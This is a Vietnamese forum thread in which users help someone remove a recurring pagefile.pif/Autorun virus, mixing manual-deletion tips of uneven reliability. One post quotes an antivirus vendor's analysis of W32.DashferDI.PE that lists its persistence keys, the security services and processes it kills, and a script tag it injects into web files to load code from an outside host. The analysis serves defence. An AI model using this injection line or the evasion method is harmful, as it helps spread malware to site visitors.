Virus parefile + AUTORUN ??

[linhads]

PC nhà mình bị 2 con virus này. Đem lại chỗ sửa chữa thì diệt được hai con đó nhưng khoãng 3 ngày sau thì con Virus đó bị lại. Không biết con virus này có bị ai cài vào máy không? ai biết cách diệt con này thì chỉ dùm. Tôi có đĩa Hiren Boot 8.8 hoặc để xóa con này thì cần mua Disk gì thì bà koan chỉ dùm. thk

Không biết nó có liên quan gì đến file parefile.sys hay không ??

[chautuanpro91]

Không phải virus đâu, bạn yên tâm.

[tungbvit]

tình trạng này là do trước bạn bị virus làm ẩn thư mục đi, giờ diệt xong rồi thì bị thế đó. Bạn vào Folder Option =>view =>Do not show hidden files and folders. Tuyệt đối ko được xóa hêt mấy cái đó đi, chứ ko lại như máy mình hồi trước xóa xong phải cài lại win là hay lắm đó

[phimlen1]

Pagefile.pif mới là virus. Trong trường hợp của bạn không phải là virus pagefile.

-Còn đối với virus Autorun thì ban tham khảo bài viết sau để diệt:

Phòng chống và diệt virus Autorun.

Hoặc bạn cũng có thể dùng lệnh trong DOS:

Mã:

Del X:\Autorun.inf

Với X là ổ đĩa trong máy bạn.

[nhadian]

PC nhà mình bị 2 con virus này. Đem lại chỗ sửa chữa thì diệt được hai con đó nhưng khoãng 3 ngày sau thì con Virus đó bị lại. Không biết con virus này có bị ai cài vào máy không? ai biết cách diệt con này thì chỉ dùm. Tôi có đĩa Hiren Boot 8.8 hoặc để xóa con này thì cần mua Disk gì thì bà koan chỉ dùm. thk

Không biết nó có liên quan gì đến file parefile.sys hay không ??

bạn xóa file autorun.ìn và pagefile.pif ở mỗi ổ đĩa rồi vào thư mục WINDOWS\system32\Com xóa 2 file LSASS.exe và SMSS.exe là xong

[nhungle233]

Hầu hết những con Autorun.inf đều xuất phát từ VN,nên chỉ cần tải BKAV mới nhất quét là đc.





Virus, Spyware, Adware

Bkav1502 (18/02/2008) cập nhật lần thứ 2: DashferDI, VtLikeN...

03[IMG]http://www.*******************/img/smile/49.gif[/IMG]32, 18/02/2008



Malware cập nhật mới nhất:



Tên malware: W32.DashferDI.PE

Thuộc họ: W32.Dashfer.PE

Loại: PE

Ngày phát hiện mẫu: 18/02/2008

Kích thước: 94Kb

Mức độ phá hoại: Cao

Nguy cơ:



Làm giảm mức độ an ninh của hệ thống.

Hiện tượng:



Sửa registry.

Không vào được chế độ safe mode của windows.

Mất checkbox để hiển thị các file hệ thống.

Cách thức lây nhiễm:



Phát tán qua trang web.

Tự động lây nhiễm qua USB.

Lây qua các file thực thi.

Cách phòng tránh:



Không nên vào các trang web cung cấp các phần mềm C.r.@.c.k, hack, các trang web đen, độc hại

Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa.

Mô tả kỹ thuật:



Xóa các K.@.y :

HKLM\...\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\...\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Ghi giá trị :

"AppInit_DLLs" = "C:\\WINDOWS\\system32\\dnsq.dll"

Vào K.@.y : HKLM\...\Windows NT\CurrentVersion\Windows để dll của virus được nạp lên mỗi khi windows khởi động

Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup

Tạo Mutex : CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy.

Dump ra các file :

%SysDir%\Com\smss.exe

%SysDir%\Com
etcfg.dll

%SysDir%\Com
etcfg.000

%SysDir%\dnsq.dll

Sửa K.@.y làm mất checkbox để hiển thị các file hệ thống.

Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.

Tắt các process có chứa một trong các xâu sau : rav, avp, twister, kv, watch, kissvc, scan, guard

Tắt các service : EQService, HookSys, McShield, tmmbd, PAVSRV, SymEvent, ekrn, KAVBase, klif, AntiVirService, MPSVCService

Tắt các cửa sổ có chứa 1 trong các xâu : ewido, bitdefender, facelesswndproc, mcafee, metapad, dr.web, avg, arp, 360safe, 360anti, ida, ...

Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script :

<script src="http://js.k01[removed].com/01.asp"></script>

Lây nhiễm vào các file thực thi tìm được trong máy.

[sang8382]

mấy con này chỉ cần xóa file atuorun.inf và pagefile đi thôi rồi dùng BKAV quét nốt cho sạch

[thangpham18]

Em bị dính con LSASS.exe và SMSS.exe ---> trong ổ C , D đều có pagefile.pif và autorun .



Nếu không xóa Autorun và vô hiệu hóa Pagefile thì đảm bảo là không thể cài được bất kỳ trình diệt virus gì cả ( ngay cả bản Portable của diễn đàn cấp cho mà còn không chạy được thì ... phải diệt bằng tay thôi .



+===> cứ xui người ta cài trình diệt virus = Spamer

[nivodigital]

Mình làm đúng như lời các bạn nói luôn. Nhưng khoảng 1 thời gian sau để USB hoặc disk CD là bị liền ( Mình tắt chế độ AUTOPLAY trong gpedit.msc và Cdrom trong Regedit rùi đó). Nó vẫn bị lại à T_T Không có cách nào xóa vĩnh viễn á ??

[venus]

bạn hãy tìm cách diệt virus trên, còn khắc phục hậu quả virus (phục hồi file, chức năng; diệt autorun,...) bạn dùng WHU download tại www.winheal.uni.cc